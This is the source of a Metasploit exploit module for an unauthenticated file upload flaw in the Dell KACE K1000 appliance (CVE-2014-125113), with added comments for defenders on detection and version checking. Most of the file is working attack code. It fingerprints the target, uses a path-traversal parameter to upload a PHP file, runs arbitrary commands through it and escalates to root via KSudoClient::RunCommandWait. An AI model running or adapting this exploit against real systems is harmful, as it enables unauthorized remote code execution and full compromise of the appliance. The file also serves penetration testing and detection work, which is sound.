rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/http/dell_kace_k1000_upload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
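# Metasploit module for the Dell KACE K1000 unauthenticated file upload
# (CVE-2014-125113).
#
# Reading guide for defenders:
# * Both the version probe and the upload go to /service/kbot_upload.php.
# * The upload carries a `machineId` query parameter made of repeated '../'
#   segments followed by /kbox/kboxwww/tmp/.
# * The uploaded file is a dot-prefixed, randomly named .php file that is
#   then requested from /tmp/ on the same host.
# * Mitigation per the module description: run 5.4.76849 / 5.5.90547 or later.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata (name, references, payload constraints,
  # targets) with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dell KACE K1000 File Upload',
        'Description' => %q{
          This module exploits a file upload vulnerability in Kace K1000
          versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547
          which allows unauthenticated users to execute arbitrary commands
          under the context of the 'www' user.

          This module also abuses the 'KSudoClient::RunCommandWait' function
          to gain root privileges.

          This module has been tested successfully with Dell KACE K1000
          version 5.3.
        },
        'License' => MSF_LICENSE,
        'Privileged' => true,
        'Platform' => 'unix', # FreeBSD
        'Arch' => ARCH_CMD,
        'Author' => [
          'Bradley Austin (steponequit)', # Initial discovery and exploit
          'bcoles', # Metasploit
        ],
        'References' => [
          ['CVE', '2014-125113'],
          ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']
        ],
        'Payload' => {
          'Space' => 1024,
          # NUL and the single quote are excluded: #exploit places the command
          # inside a single-quoted PHP string literal.
          'BadChars' => "\x00\x27",
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl'
            }
        },
        'DefaultTarget' => 0,
        'Targets' => [
          ['Automatic Targeting', { 'auto' => true }]
        ],
        'DisclosureDate' => '2014-03-07',
        # NOTE(review): these are still placeholders. #exploit writes a file
        # under the appliance web root and issues two HTTP requests, so
        # ARTIFACTS_ON_DISK / IOC_IN_LOGS look applicable -- confirm on a test
        # appliance before recording them.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Fingerprints the target from the response headers of
  # /service/kbot_upload.php, without uploading anything.
  #
  # @return [Exploit::CheckCode] Unknown when there is no response; Safe when
  #   the reply is not a 500 carrying the K1000 appliance header, or when the
  #   version is outside the affected range; Vulnerable when it is inside;
  #   Detected when a K1000 answers but its version header cannot be parsed.
  def check
    res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))
    unless res
      vprint_error('Connection failed')
      return Exploit::CheckCode::Unknown
    end

    # A host that answers 500 without the appliance header used to raise
    # NoMethodError (nil.downcase) and abort the check; to_s makes it report
    # Safe like every other non-K1000 reply.
    appliance = res.headers['X-DellKACE-Appliance'].to_s.downcase
    return Exploit::CheckCode::Safe unless res.code == 500 && appliance == 'k1000'

    version = res.headers['X-DellKACE-Version']
    # Major and minor are matched as single digits, so a header such as
    # "10.0.1" does not parse and yields Detected rather than Safe.
    match = /\A([0-9])\.([0-9])\.([0-9]+)\z/.match(version.to_s)
    return Exploit::CheckCode::Detected unless match

    vprint_status("Found Dell KACE K1000 version #{version}")
    major, minor, build = match.captures.map(&:to_i)
    return Exploit::CheckCode::Safe unless major == 5

    # NOTE(review): the description says "prior to" 5.4.76849 / 5.5.90547,
    # but `<=` also reports those two builds as Vulnerable. If they are the
    # fixed builds this is a false positive -- confirm against the vendor
    # advisory before switching to `<`.
    in_range = case minor
               when 0..3 then true # 5.0 to 5.3
               when 4 then build <= 76849 # 5.4 prior to 5.4.76849
               when 5 then build <= 90547 # 5.5 prior to 5.5.90547
               else false
               end

    in_range ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
  end

  # Uploads a PHP file through /service/kbot_upload.php and then requests it
  # from /tmp/ so that the appliance runs it.
  #
  # Observable behaviour, useful when writing detections:
  # * one POST to /service/kbot_upload.php whose `machineId` query parameter
  #   contains four to eight '../' segments followed by /kbox/kboxwww/tmp/;
  # * the query parameters are shuffled per request, so a signature should
  #   not depend on their order;
  # * one GET for /tmp/.<5-12 alphanumerics>.php;
  # * the uploaded PHP calls KSudoClient::RunCommandWait and its command
  #   starts by removing the file itself, so the file should only persist
  #   when the second request fails.
  #
  # @return [void] every failure path ends in fail_with
  def exploit
    # upload payload
    fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php"
    payload_path = "/kbox/kboxwww/tmp/"
    post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"
    print_status("Uploading #{fname} (#{post_data.length} bytes)")
    res = send_request_cgi(
      'uri' => normalize_uri('service', 'kbot_upload.php'),
      'method' => 'POST',
      'vars_get' => Hash[{
        'filename' => fname,
        'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}",
        'checksum' => 'SCRAMBLE',
        'mac' => rand_text_alphanumeric(rand(8) + 5),
        'kbotId' => rand_text_alphanumeric(rand(8) + 5),
        'version' => rand_text_alphanumeric(rand(8) + 5),
        'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5)
      }.to_a.shuffle],
      'data' => post_data
    )

    fail_with(Failure::Unreachable, 'Connection failed') unless res
    fail_with(Failure::UnexpectedReply, 'Unable to upload payload') unless res.code == 200

    print_good('Payload uploaded successfully')

    # execute payload
    res = send_request_cgi('uri' => normalize_uri('tmp', fname))

    fail_with(Failure::Unreachable, 'Connection failed') unless res

    case res.code
    when 200
      print_good('Payload executed successfully')
    when 404
      # The upload returned 200 but nothing is served at the expected path.
      fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")
    else
      fail_with(Failure::UnexpectedReply, 'Unable to execute payload')
    end
  end
end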